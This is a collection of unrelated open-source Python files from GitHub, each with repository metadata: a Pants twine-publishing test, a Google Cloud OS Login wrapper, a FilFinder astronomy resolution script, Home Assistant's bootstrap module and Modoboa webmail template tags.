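    # TWINE_PASSWORD_PYPI is a repository-scoped secret: the assertions below
    # expect it to surface as TWINE_PASSWORD only for the @pypi repository and
    # not for @private.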
return rule_runner
@pytest.fixture
def packages():
return (
BuiltPackage(
EMPTY_DIGEST,
(
BuiltPackageArtifact("my-package-0.1.0.tar.gz"),
BuiltPackageArtifact("my_package-0.1.0-py3-none-any.whl"),
),
),
)
def project_files(
skip_twine: bool = False, repositories: list[str] = ["@pypi", "@private"]
) -> dict[str, str]:
return {
"src/BUILD": dedent(
f"""\
python_sources()
python_distribution(
name="dist",
provides=python_artifact(
name="my-package",
version="0.1.0",
),
repositories={repositories!r},
skip_twine={skip_twine},
)
"""
),
"src/hello.py": """print("hello")""",
".pypirc": "",
}
def request_publish_processes(rule_runner: RuleRunner, packages) -> PublishProcesses:
tgt = rule_runner.get_target(Address("src", target_name="dist"))
fs = PublishPythonPackageFieldSet.create(tgt)
return rule_runner.request(PublishProcesses, [fs._request(packages)])
def assert_package(
package: PublishPackages,
expect_names: tuple[str, ...],
expect_description: str,
expect_process: Callable[[Process], None] | None,
) -> None:
assert package.names == expect_names
assert package.description == expect_description
if expect_process:
assert package.process
expect_process(package.process.process)
else:
assert package.process is None
def test_twine_upload(rule_runner, packages) -> None:
rule_runner.write_files(project_files(skip_twine=False))
result = request_publish_processes(rule_runner, packages)
assert len(result) == 2
assert_package(
result[0],
expect_names=(
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
expect_description="@pypi",
expect_process=process_assertion(
argv=(
"./twine.pex_pex_shim.sh",
"upload",
"--non-interactive",
"--config-file=.pypirc",
"--repository=pypi",
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
env=FrozenDict({"TWINE_PASSWORD": "secret"}),
),
)
assert_package(
result[1],
expect_names=(
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
expect_description="@private",
expect_process=process_assertion(
argv=(
"./twine.pex_pex_shim.sh",
"upload",
"--non-interactive",
"--config-file=.pypirc",
"--repository=private",
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
env=FrozenDict(),
),
)
def test_skip_twine(rule_runner, packages) -> None:
rule_runner.write_files(project_files(skip_twine=True))
result = request_publish_processes(rule_runner, packages)
assert len(result) == 1
assert_package(
result[0],
expect_names=(
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
),
expect_description="(by `skip_twine` on src:dist)",
expect_process=None,
)
# Skip twine globally from config option.
rule_runner.set_options(["--twine-skip"])
result = request_publish_processes(rule_runner, packages)
assert len(result) == 0
@pytest.mark.parametrize(
"options, cert_arg",
[
pytest.param(
[],
None,
id="No ca cert",
),
pytest.param(
["--twine-ca-certs-path={}"],
"--cert=ca_certs.pem",
id="[twine].ca_certs_path",
),
        # This test needs a working CA bundle; verified manually for now.
# pytest.param(
# ["--ca-certs-path={}"],
# "--cert=ca_certs.pem",
# id="[GLOBAL].ca_certs_path",
# ),
],
)
def test_twine_cert_arg(rule_runner, packages, options, cert_arg) -> None:
ca_cert_path = rule_runner.write_files({"conf/ca_certs.pem": ""})[0]
rule_runner.write_files(project_files(repositories=["@private"]))
set_options(rule_runner, [opt.format(ca_cert_path) for opt in options])
result = request_publish_processes(rule_runner, packages)
assert len(result) == 1
process = result[0].process
assert process
if cert_arg:
assert cert_arg in process.process.argv
else:
assert not any(arg.startswith("--cert") for arg in process.process.argv)
| {
"content_hash": "109cf833abae90cd6424fbd103e4f669",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 94,
"avg_line_length": 31.210526315789473,
"alnum_prop": 0.5905258316725434,
"repo_name": "pantsbuild/pants",
"id": "1f0ee49b478b72317828524a74747dae95386611",
"size": "6655",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "src/python/pants/backend/python/goals/publish_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "688"
},
{
"name": "Dockerfile",
"bytes": "1132"
},
{
"name": "Go",
"bytes": "67315"
},
{
"name": "Java",
"bytes": "97190"
},
{
"name": "Kotlin",
"bytes": "6433"
},
{
"name": "Mustache",
"bytes": "3771"
},
{
"name": "Python",
"bytes": "7582858"
},
{
"name": "Rust",
"bytes": "1657282"
},
{
"name": "Scala",
"bytes": "21950"
},
{
"name": "Shell",
"bytes": "31400"
},
{
"name": "Starlark",
"bytes": "76892"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from google.cloud.oslogin_v1 import types
from google.cloud.oslogin_v1.gapic import enums
from google.cloud.oslogin_v1.gapic import os_login_service_client
class OsLoginServiceClient(os_login_service_client.OsLoginServiceClient):
__doc__ = os_login_service_client.OsLoginServiceClient.__doc__
enums = enums
__all__ = ("enums", "types", "OsLoginServiceClient")
| {
"content_hash": "ebcfc00e88e06582a57ff3fbc2788b8d",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 73,
"avg_line_length": 31.692307692307693,
"alnum_prop": 0.7621359223300971,
"repo_name": "tseaver/google-cloud-python",
"id": "83a5ac2635377b56a180adf7be09600c5135a48b",
"size": "1015",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "oslogin/google/cloud/oslogin_v1/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "30519057"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
'''
Check the resolution effects of the masking process.
Degrade an image to match the resolution of a more distant one,
then compare the outputs.
'''
from fil_finder import fil_finder_2D
import numpy as np
from astropy.io.fits import getdata
from astropy import convolution
import matplotlib.pyplot as p
# We want to compare one of the closest regions (Pipe)
# to one of the most distant (Orion-A S).
pipe_img, pipe_hdr = getdata("pipeCenterB59-250.fits", header=True)
pipe_distance = 140. # pc
# orion_img, orion_hdr = getdata("orionA-S-250.fits", header=True)
orion_distance = 400. # pc
r = orion_distance / pipe_distance
conv = np.sqrt(r**2. - 1)
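# Note: adding Gaussian beams in quadrature, a map observed with beam width b
# must be convolved with a kernel of width sqrt((r*b)**2 - b**2) = b*sqrt(r**2 - 1)
# to mimic being observed from r times further away; here that factor is
# applied directly in pixel units.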
## What to do?
compute = False
output = True
downsample = False
if compute:
kernel = convolution.Gaussian2DKernel(conv)
pipe_degraded = convolution.convolve(pipe_img, kernel, boundary='fill',
fill_value=np.NaN)
p.subplot(121)
p.imshow(np.arctan(pipe_img/np.percentile(pipe_img[np.isfinite(pipe_img)], 95)),
origin="lower", interpolation="nearest")
p.subplot(122)
p.imshow(np.arctan(pipe_degraded/np.percentile(pipe_degraded[np.isfinite(pipe_degraded)], 95)),
origin="lower", interpolation="nearest")
p.show()
filfind = fil_finder_2D(pipe_degraded, pipe_hdr, 18.2, 30, 15, 30, distance=400, glob_thresh=20)
filfind.run(verbose=False, save_name="degraded_pipe", save_plots=False)
## Analysis
if output:
from astropy.table import Table
deg_pipe_analysis = Table.read("degraded_pipe_table.fits")
pipe_analysis = Table.read("pipeCenterB59-250/pipeCenterB59-250_table.fits")
# Plot lengths, widths, orientation, curvature. Adjust for distance difference
# p.subplot2grid((4,2), (0,0))
p.subplot(411)
num1 = int(np.sqrt(deg_pipe_analysis["FWHM"][np.isfinite(deg_pipe_analysis["FWHM"])].size))
num2 = int(np.sqrt(pipe_analysis["FWHM"][np.isfinite(pipe_analysis["FWHM"])].size))
p.hist(deg_pipe_analysis["FWHM"][np.isfinite(deg_pipe_analysis["FWHM"])] / conv,
bins=num1, label="Degraded", alpha=0.5, color='g')
p.hist(pipe_analysis["FWHM"][np.isfinite(pipe_analysis["FWHM"])],
bins=num2, label="Normal", alpha=0.5, color='b')
p.xlabel("Width (pc)")
p.legend()
# p.subplot2grid((4,2), (0,1))
p.subplot(412)
p.hist(deg_pipe_analysis["Lengths"] / conv, bins=num1, label="Degraded", alpha=0.5)
p.hist(pipe_analysis["Lengths"], bins=num2, label="Normal", alpha=0.5)
p.xlabel("Length (pc)")
# p.legend()
# p.subplot2grid((4,2), (1,0))
p.subplot(413)
p.hist(deg_pipe_analysis["Orientation"], bins=num1, label="Degraded", alpha=0.5)
p.hist(pipe_analysis["Orientation"], bins=num2, label="Normal", alpha=0.5)
p.xlabel("Orientation")
# p.legend()
# p.subplot2grid((4,2), (1,1))
p.subplot(414)
p.hist(deg_pipe_analysis["Curvature"], bins=num1, label="Degraded", alpha=0.5)
p.hist(pipe_analysis["Curvature"], bins=num2, label="Normal", alpha=0.5)
p.xlabel("Curvature")
# p.legend()
# p.savefig("pipe_comparison_hists.pdf")
# p.savefig("pipe_comparison_hists.eps")
p.show()
## Compare distributions using KS Test
from scipy.stats import ks_2samp
fwhm_ks = ks_2samp(deg_pipe_analysis["FWHM"][np.isfinite(deg_pipe_analysis["FWHM"])] / conv,
pipe_analysis["FWHM"][np.isfinite(pipe_analysis["FWHM"])])
l_ks = ks_2samp(deg_pipe_analysis["Lengths"] / conv,
pipe_analysis["Lengths"])
o_ks = ks_2samp(np.sin(deg_pipe_analysis["Orientation"]),
np.sin(pipe_analysis["Orientation"]))
c_ks = ks_2samp(deg_pipe_analysis["Curvature"],
pipe_analysis["Curvature"])
ks_tab = Table([fwhm_ks, l_ks, o_ks, c_ks],
names=["FWHM", "Length", "Orientation", "Curvature"])
# ks_tab.write("pipe_comparison_ks_results.csv")
# ks_tab.write("pipe_comparison_ks_results.tex")
## Compare skeletons
deg_pipe_skel = getdata("degraded_pipe_skeletons.fits", 0)
deg_pipe_skel[np.where(deg_pipe_skel>1)] = 1
deg_pipe_skel = deg_pipe_skel[510:1200, 1440:1920]
filfind = fil_finder_2D(pipe_img, pipe_hdr, 18.2, 30, 15, 30, distance=400, glob_thresh=20)
filfind.create_mask(border_masking=True)
filfind.medskel(verbose=False)
filfind.analyze_skeletons()
pipe_skel = filfind.skeleton[30:-30, 30:-30] #getdata("pipeCenterB59-250/pipeCenterB59-250_skeletons.fits", 0)
pipe_skel[np.where(pipe_skel>1)] = 1
pipe_skel = pipe_skel[510:1200, 1440:1920]
# p.subplot2grid((4,2), (2,0), colspan=2, rowspan=2)
pipe_img = pipe_img[510:1200, 1440:1920]
ax = p.imshow(np.arctan(pipe_img/np.percentile(pipe_img[np.isfinite(pipe_img)], 95)),
origin="lower", interpolation="nearest", cmap="binary")
ax.axes.get_xaxis().set_ticks([])
ax.axes.get_yaxis().set_ticks([])
cont1 = p.contour(pipe_skel, colors="b", linewidths=3, label="Normal")
cont1.collections[0].set_label("Normal")
cont2 = p.contour(deg_pipe_skel, colors="g", alpha=0.5, label="Degraded")
cont2.collections[0].set_label("Degraded")
p.legend(loc="upper right")
p.show()
if downsample:
def downsample_axis(myarr, factor, axis, estimator=np.nanmean, truncate=False):
"""
Downsample an ND array by averaging over *factor* pixels along an axis.
Crops right side if the shape is not a multiple of factor.
This code is pure np and should be fast.
Parameters
----------
myarr : `~numpy.ndarray`
The array to downsample
factor : int
The factor to downsample by
axis : int
The axis to downsample along
estimator : function
defaults to mean. You can downsample by summing or
something else if you want a different estimator
(e.g., downsampling error: you want to sum & divide by sqrt(n))
truncate : bool
Whether to truncate the last chunk or average over a smaller number.
e.g., if you downsample [1,2,3,4] by a factor of 3, you could get either
[2] or [2,4] if truncate is True or False, respectively.
"""
# size of the dimension of interest
xs = myarr.shape[axis]
if xs % int(factor) != 0:
if truncate:
view = [slice(None) for ii in range(myarr.ndim)]
view[axis] = slice(None,xs-(xs % int(factor)))
crarr = myarr[view]
else:
newshape = list(myarr.shape)
newshape[axis] = (factor - xs % int(factor))
extension = np.empty(newshape) * np.nan
crarr = np.concatenate((myarr,extension), axis=axis)
else:
crarr = myarr
def makeslice(startpoint,axis=axis,step=factor):
# make empty slices
view = [slice(None) for ii in range(myarr.ndim)]
# then fill the appropriate slice
view[axis] = slice(startpoint,None,step)
return view
# The extra braces here are crucial: We're adding an extra dimension so we
# can average across it!
stacked_array = np.concatenate([[crarr[makeslice(ii)]] for ii in range(factor)])
dsarr = estimator(stacked_array, axis=0)
return dsarr
downsample = downsample_axis(pipe_img, 3, axis=0)
downsample = downsample_axis(downsample, 3, axis=1)
    print(downsample.shape)
p.subplot(1,2,1)
p.title("Pipe Normal")
p.imshow(np.arctan(pipe_img/np.percentile(pipe_img[np.isfinite(pipe_img)], 95)),
origin="lower", interpolation="nearest")
p.subplot(1,2,2)
p.title("Downsample")
p.imshow(np.arctan(downsample/np.percentile(downsample[np.isfinite(downsample)], 95)),
origin="lower", interpolation="nearest")
p.show() | {
"content_hash": "4f467fb64b233b7f8812a878326503be",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 115,
"avg_line_length": 36.88837209302326,
"alnum_prop": 0.626780986004287,
"repo_name": "dcolombo/FilFinder",
"id": "421fc5d84cda562fd26c0d319de90c7ac370eed7",
"size": "7990",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/paper_figures/match_resolution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "244375"
}
],
"symlink_target": ""
} |
"""Provide methods to bootstrap a Home Assistant instance."""
import asyncio
import logging
import logging.handlers
import os
import sys
from time import time
from collections import OrderedDict
from typing import Any, Optional, Dict
import voluptuous as vol
import homeassistant.components as core_components
from homeassistant.components import persistent_notification
import homeassistant.config as conf_util
import homeassistant.core as core
from homeassistant.const import EVENT_HOMEASSISTANT_CLOSE
from homeassistant.setup import async_setup_component
import homeassistant.loader as loader
from homeassistant.util.logging import AsyncHandler
from homeassistant.util.package import async_get_user_site, get_user_site
from homeassistant.util.yaml import clear_secret_cache
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.signal import async_register_signal_handling
_LOGGER = logging.getLogger(__name__)
ERROR_LOG_FILENAME = 'home-assistant.log'
FIRST_INIT_COMPONENT = set((
'recorder', 'mqtt', 'mqtt_eventstream', 'logger', 'introduction',
'frontend', 'history'))
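# The components above are set up in a first stage (see "stage 1" below) so
# that core infrastructure such as the recorder, logger and frontend is ready
# before the remaining components are initialized.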
def from_config_dict(config: Dict[str, Any],
hass: Optional[core.HomeAssistant]=None,
config_dir: Optional[str]=None,
enable_log: bool=True,
verbose: bool=False,
skip_pip: bool=False,
log_rotate_days: Any=None) \
-> Optional[core.HomeAssistant]:
"""Try to configure Home Assistant from a configuration dictionary.
    Dynamically loads required components and their dependencies.
"""
if hass is None:
hass = core.HomeAssistant()
if config_dir is not None:
config_dir = os.path.abspath(config_dir)
hass.config.config_dir = config_dir
hass.loop.run_until_complete(
async_mount_local_lib_path(config_dir, hass.loop))
# run task
hass = hass.loop.run_until_complete(
async_from_config_dict(
config, hass, config_dir, enable_log, verbose, skip_pip,
log_rotate_days)
)
return hass
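# Illustrative call (component keys beyond 'homeassistant' depend on which
# integrations you want set up; None is returned if the core config fails
# validation):
#
#     hass = from_config_dict({
#         'homeassistant': {'name': 'Home', 'time_zone': 'UTC'},
#         'frontend': {},
#     }, config_dir='/tmp/ha-config')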
@asyncio.coroutine
def async_from_config_dict(config: Dict[str, Any],
hass: core.HomeAssistant,
config_dir: Optional[str]=None,
enable_log: bool=True,
verbose: bool=False,
skip_pip: bool=False,
log_rotate_days: Any=None) \
-> Optional[core.HomeAssistant]:
"""Try to configure Home Assistant from a configuration dictionary.
    Dynamically loads required components and their dependencies.
This method is a coroutine.
"""
start = time()
core_config = config.get(core.DOMAIN, {})
try:
yield from conf_util.async_process_ha_core_config(hass, core_config)
except vol.Invalid as ex:
conf_util.async_log_exception(ex, 'homeassistant', core_config, hass)
return None
yield from hass.async_add_job(conf_util.process_ha_config_upgrade, hass)
if enable_log:
async_enable_logging(hass, verbose, log_rotate_days)
hass.config.skip_pip = skip_pip
if skip_pip:
_LOGGER.warning("Skipping pip installation of required modules. "
"This may cause issues")
if not loader.PREPARED:
yield from hass.async_add_job(loader.prepare, hass)
# Merge packages
conf_util.merge_packages_config(
config, core_config.get(conf_util.CONF_PACKAGES, {}))
# Make a copy because we are mutating it.
# Use OrderedDict in case original one was one.
# Convert values to dictionaries if they are None
new_config = OrderedDict()
for key, value in config.items():
new_config[key] = value or {}
config = new_config
# Filter out the repeating and common config section [homeassistant]
components = set(key.split(' ')[0] for key in config.keys()
if key != core.DOMAIN)
# setup components
# pylint: disable=not-an-iterable
res = yield from core_components.async_setup(hass, config)
if not res:
_LOGGER.error("Home Assistant core failed to initialize. "
"further initialization aborted")
return hass
yield from persistent_notification.async_setup(hass, config)
_LOGGER.info("Home Assistant core initialized")
# stage 1
for component in components:
if component not in FIRST_INIT_COMPONENT:
continue
hass.async_add_job(async_setup_component(hass, component, config))
yield from hass.async_block_till_done()
# stage 2
for component in components:
if component in FIRST_INIT_COMPONENT:
continue
hass.async_add_job(async_setup_component(hass, component, config))
yield from hass.async_block_till_done()
stop = time()
_LOGGER.info("Home Assistant initialized in %.2fs", stop-start)
async_register_signal_handling(hass)
return hass
def from_config_file(config_path: str,
hass: Optional[core.HomeAssistant]=None,
verbose: bool=False,
skip_pip: bool=True,
log_rotate_days: Any=None):
"""Read the configuration file and try to start all the functionality.
Will add functionality to 'hass' parameter if given,
instantiates a new Home Assistant object if 'hass' is not given.
"""
if hass is None:
hass = core.HomeAssistant()
# run task
hass = hass.loop.run_until_complete(
async_from_config_file(
config_path, hass, verbose, skip_pip, log_rotate_days)
)
return hass
@asyncio.coroutine
def async_from_config_file(config_path: str,
hass: core.HomeAssistant,
verbose: bool=False,
skip_pip: bool=True,
log_rotate_days: Any=None):
"""Read the configuration file and try to start all the functionality.
Will add functionality to 'hass' parameter.
This method is a coroutine.
"""
# Set config dir to directory holding config file
config_dir = os.path.abspath(os.path.dirname(config_path))
hass.config.config_dir = config_dir
yield from async_mount_local_lib_path(config_dir, hass.loop)
async_enable_logging(hass, verbose, log_rotate_days)
try:
config_dict = yield from hass.async_add_job(
conf_util.load_yaml_config_file, config_path)
except HomeAssistantError as err:
_LOGGER.error("Error loading %s: %s", config_path, err)
return None
finally:
clear_secret_cache()
hass = yield from async_from_config_dict(
config_dict, hass, enable_log=False, skip_pip=skip_pip)
return hass
@core.callback
def async_enable_logging(hass: core.HomeAssistant, verbose: bool=False,
log_rotate_days=None) -> None:
"""Set up the logging.
This method must be run in the event loop.
"""
logging.basicConfig(level=logging.INFO)
fmt = ("%(asctime)s %(levelname)s (%(threadName)s) "
"[%(name)s] %(message)s")
colorfmt = "%(log_color)s{}%(reset)s".format(fmt)
datefmt = '%Y-%m-%d %H:%M:%S'
# Suppress overly verbose logs from libraries that aren't helpful
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
logging.getLogger('aiohttp.access').setLevel(logging.WARNING)
try:
from colorlog import ColoredFormatter
logging.getLogger().handlers[0].setFormatter(ColoredFormatter(
colorfmt,
datefmt=datefmt,
reset=True,
log_colors={
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'red',
}
))
except ImportError:
pass
# Log errors to a file if we have write access to file or config dir
err_log_path = hass.config.path(ERROR_LOG_FILENAME)
err_path_exists = os.path.isfile(err_log_path)
# Check if we can write to the error log if it exists or that
# we can create files in the containing directory if not.
if (err_path_exists and os.access(err_log_path, os.W_OK)) or \
(not err_path_exists and os.access(hass.config.config_dir, os.W_OK)):
if log_rotate_days:
err_handler = logging.handlers.TimedRotatingFileHandler(
err_log_path, when='midnight', backupCount=log_rotate_days)
else:
err_handler = logging.FileHandler(
err_log_path, mode='w', delay=True)
err_handler.setLevel(logging.INFO if verbose else logging.WARNING)
err_handler.setFormatter(logging.Formatter(fmt, datefmt=datefmt))
async_handler = AsyncHandler(hass.loop, err_handler)
@asyncio.coroutine
def async_stop_async_handler(event):
"""Cleanup async handler."""
logging.getLogger('').removeHandler(async_handler)
yield from async_handler.async_close(blocking=True)
hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_CLOSE, async_stop_async_handler)
logger = logging.getLogger('')
logger.addHandler(async_handler)
logger.setLevel(logging.INFO)
else:
_LOGGER.error(
"Unable to setup error log %s (access denied)", err_log_path)
def mount_local_lib_path(config_dir: str) -> str:
"""Add local library to Python Path."""
deps_dir = os.path.join(config_dir, 'deps')
lib_dir = get_user_site(deps_dir)
if lib_dir not in sys.path:
sys.path.insert(0, lib_dir)
return deps_dir
@asyncio.coroutine
def async_mount_local_lib_path(config_dir: str,
loop: asyncio.AbstractEventLoop) -> str:
"""Add local library to Python Path.
This function is a coroutine.
"""
deps_dir = os.path.join(config_dir, 'deps')
lib_dir = yield from async_get_user_site(deps_dir, loop=loop)
if lib_dir not in sys.path:
sys.path.insert(0, lib_dir)
return deps_dir
| {
"content_hash": "01ad0a8eb5220c71d30c8f2984622b53",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 77,
"avg_line_length": 34.346666666666664,
"alnum_prop": 0.6304347826086957,
"repo_name": "MungoRae/home-assistant",
"id": "7831036ff597e6f68403e718deffe2f7256ed582",
"size": "10304",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/bootstrap.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13788"
},
{
"name": "HTML",
"bytes": "1686638"
},
{
"name": "JavaScript",
"bytes": "15192"
},
{
"name": "Python",
"bytes": "7266062"
},
{
"name": "Ruby",
"bytes": "517"
},
{
"name": "Shell",
"bytes": "15114"
}
],
"symlink_target": ""
} |
"""Custom template tags."""
from six.moves.urllib.parse import urlencode
from django import template
from django.urls import reverse
from django.template.loader import render_to_string
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from ..lib import imapheader, separate_mailbox
from .. import constants
register = template.Library()
@register.simple_tag
def viewmail_menu(selection, folder, user, mail_id=None):
"""Menu of the viewmail location."""
entries = [{
"name": "back",
"url": "javascript:history.go(-1)",
"img": "fa fa-arrow-left",
"class": "btn-default",
"label": _("Back")
}, {
"name": "reply",
"url": "action=reply&mbox=%s&mailid=%s" % (folder, mail_id),
"img": "fa fa-mail-reply",
"class": "btn-primary",
"label": _("Reply"),
"menu": [{
"name": "replyall",
"url": "action=reply&mbox=%s&mailid=%s&all=1" % (folder, mail_id),
"img": "fa fa-mail-reply-all",
"label": _("Reply all")
}, {
"name": "forward",
"url": "action=forward&mbox=%s&mailid=%s" % (folder, mail_id),
"img": "fa fa-mail-forward",
"label": _("Forward")
}]
}, {
"name": "delete",
"img": "fa fa-trash",
"class": "btn-danger",
"url": u"{0}?mbox={1}&selection[]={2}".format(
reverse("modoboa_webmail:mail_delete"), folder, mail_id),
"title": _("Delete")
}, {
"name": "mark_as_junk",
"img": "fa fa-fire",
"class": "btn-warning",
"url": u"{0}?mbox={1}&selection[]={2}".format(
reverse("modoboa_webmail:mail_mark_as_junk"), folder, mail_id),
"title": _("Mark as spam")
}, {
"name": "display_options",
"title": _("Display options"),
"img": "fa fa-cog",
"menu": [{
"name": "activate_links",
"label": _("Activate links")
}, {
"name": "disable_links",
"label": _("Disable links")
}, {
"name": "show_source",
"label": _("Show source"),
"url": u"{}?mbox={}&mailid={}".format(
reverse("modoboa_webmail:mailsource_get"), folder, mail_id)
}]
}]
if folder == user.parameters.get_value("junk_folder"):
entries[3] = {
"name": "mark_as_not_junk",
"img": "fa fa-thumbs-up",
"class": "btn-success",
"url": u"{0}?mbox={1}&selection[]={2}".format(
reverse("modoboa_webmail:mail_mark_as_not_junk"),
folder, mail_id),
"title": _("Mark as not spam")
}
menu = render_to_string('common/buttons_list.html',
{"selection": selection, "entries": entries,
"user": user, "extraclasses": "pull-left"})
return menu
@register.simple_tag
def compose_menu(selection, backurl, user, **kwargs):
"""The menu of the compose action."""
entries = [
{"name": "back",
"url": "javascript:history.go(-2);",
"img": "fa fa-arrow-left",
"class": "btn-default",
"label": _("Back")},
{"name": "sendmail",
"url": "",
"img": "fa fa-send",
"class": "btn-default btn-primary",
"label": _("Send")},
]
context = {
"selection": selection, "entries": entries, "user": user
}
context.update(kwargs)
return render_to_string('modoboa_webmail/compose_menubar.html', context)
@register.simple_tag
def listmailbox_menu(selection, folder, user, **kwargs):
"""The menu of the listmailbox action."""
entries = [{
"name": "totrash",
"title": _("Delete"),
"class": "btn-danger",
"img": "fa fa-trash",
"url": reverse("modoboa_webmail:mail_delete")
}, {
"name": "mark_as_junk_multi",
"img": "fa fa-fire",
"class": "btn-warning",
"url": reverse("modoboa_webmail:mail_mark_as_junk"),
"title": _("Mark as spam")
}, {
"name": "actions",
"label": _("Actions"),
"class": "btn btn-default",
"menu": [{
"name": "mark-read",
"label": _("Mark as read"),
"url": u"{0}?status=read".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}, {
"name": "mark-unread",
"label": _("Mark as unread"),
"url": u"{0}?status=unread".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}, {
"name": "mark-flagged",
"label": _("Mark as flagged"),
"url": u"{0}?status=flagged".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}, {
"name": "mark-unflagged",
"label": _("Mark as unflagged"),
"url": u"{0}?status=unflagged".format(
reverse("modoboa_webmail:mail_mark", args=[folder]))
}]
}]
sort_actions = [{
"header": True,
"label": _("Sort by")
}]
current_order = kwargs.get("sort_order")
for order in constants.SORT_ORDERS:
entry = {
"name": "sort_by_{}".format(order[0]),
"label": order[1],
"url": order[0],
"class": "sort-order"
}
if current_order[1:] == order[0]:
css = "fa fa-arrow-{}".format(
"down" if current_order[0] == "-" else "up")
entry.update({"img": css})
sort_actions.append(entry)
entries[2]["menu"] += sort_actions
if folder == user.parameters.get_value("trash_folder"):
entries[0]["class"] += " disabled"
entries[2]["menu"].insert(4, {
"name": "empty",
"label": _("Empty folder"),
"url": u"{0}?name={1}".format(
reverse("modoboa_webmail:trash_empty"), folder)
})
elif folder == user.parameters.get_value("junk_folder"):
entries[1] = {
"name": "mark_as_not_junk_multi",
"img": "fa fa-thumbs-up",
"class": "btn-success",
"url": reverse("modoboa_webmail:mail_mark_as_not_junk"),
"title": _("Mark as not spam")
}
return render_to_string('modoboa_webmail/main_action_bar.html', {
'selection': selection, 'entries': entries, 'user': user, 'css': "nav",
})
@register.simple_tag
def print_mailboxes(
tree, selected=None, withunseen=False, selectonly=False,
hdelimiter='.'):
"""Display a tree of mailboxes and sub-mailboxes.
:param tree: the mailboxes to display
"""
result = ""
for mbox in tree:
cssclass = ""
name = mbox["path"] if "sub" in mbox else mbox["name"]
label = (
mbox["label"] if "label" in mbox else
separate_mailbox(mbox["name"], hdelimiter)[0])
if mbox.get("removed", False):
cssclass = "disabled"
elif selected == name:
cssclass = "active"
result += "<li name='%s' class='droppable %s'>\n" % (name, cssclass)
cssclass = ""
extra_attrs = ""
if withunseen and "unseen" in mbox:
label += " (%d)" % mbox["unseen"]
cssclass += " unseen"
extra_attrs = ' data-toggle="%d"' % mbox["unseen"]
if "sub" in mbox:
if selected is not None and selected != name and selected.count(
name):
ul_state = "visible"
div_state = "expanded"
else:
ul_state = "hidden"
div_state = "collapsed"
result += "<div class='clickbox %s'></div>" % div_state
result += "<a href='%s' class='%s' name='%s'%s>" % (
"path" in mbox and mbox["path"] or mbox["name"], cssclass,
'selectfolder' if selectonly else 'loadfolder', extra_attrs
)
iclass = mbox["class"] if "class" in mbox \
else "fa fa-folder"
result += "<span class='%s'></span> %s</a>" % (iclass, label)
if "sub" in mbox and mbox["sub"]:
result += "<ul name='%s' class='nav nav-pills nav-stacked %s'>" % (
mbox["path"], ul_state) + print_mailboxes(
mbox["sub"], selected, withunseen, selectonly, hdelimiter
) + "</ul>\n"
result += "</li>\n"
return mark_safe(result)
@register.simple_tag
def mboxes_menu():
"""Mailboxes menu."""
entries = [
{"name": "newmbox",
"url": reverse("modoboa_webmail:folder_add"),
"img": "fa fa-plus",
"label": _("Create a new folder"),
"modal": True,
"modalcb": "webmail.mboxform_cb",
"closecb": "webmail.mboxform_close",
"class": "btn-default btn-xs"},
{"name": "editmbox",
"url": reverse("modoboa_webmail:folder_change"),
"img": "fa fa-edit",
"label": _("Edit the selected folder"),
"class": "btn-default btn-xs"},
{"name": "removembox",
"url": reverse("modoboa_webmail:folder_delete"),
"img": "fa fa-trash",
"label": _("Remove the selected folder"),
"class": "btn-default btn-xs"},
{"name": "compress",
"img": "fa fa-compress",
"label": _("Compress folder"),
"class": "btn-default btn-xs",
"url": reverse("modoboa_webmail:folder_compress")}
]
context = {
"entries": entries,
"css": "dropdown-menu",
}
return render_to_string('common/menu.html', context)
@register.filter
def parse_imap_header(value, header):
"""Simple template tag to display a IMAP header."""
safe = True
try:
value = getattr(imapheader, "parse_%s" % header)(value)
except AttributeError:
pass
if header == "from":
value = value[0]
elif header == "subject":
safe = False
return value if not safe else mark_safe(value)
@register.simple_tag
def attachment_url(mbox, mail_id, fname, key):
"""Return full download url of an attachment."""
url = reverse("modoboa_webmail:attachment_get")
params = {
"mbox": mbox,
"mailid": mail_id,
"fname": smart_str(fname),
"partnumber": key
}
url = "{}?{}".format(url, urlencode(params))
return url
| {
"content_hash": "2b77083b68d4cb1123a58378cec2eaaf",
"timestamp": "",
"source": "github",
"line_count": 311,
"max_line_length": 79,
"avg_line_length": 33.81028938906753,
"alnum_prop": 0.5078459343794579,
"repo_name": "modoboa/modoboa-webmail",
"id": "ad897862457f584da504c6081dfbb07432526944",
"size": "10531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modoboa_webmail/templatetags/webmail_tags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4861"
},
{
"name": "HTML",
"bytes": "9888"
},
{
"name": "JavaScript",
"bytes": "48325"
},
{
"name": "Python",
"bytes": "164115"
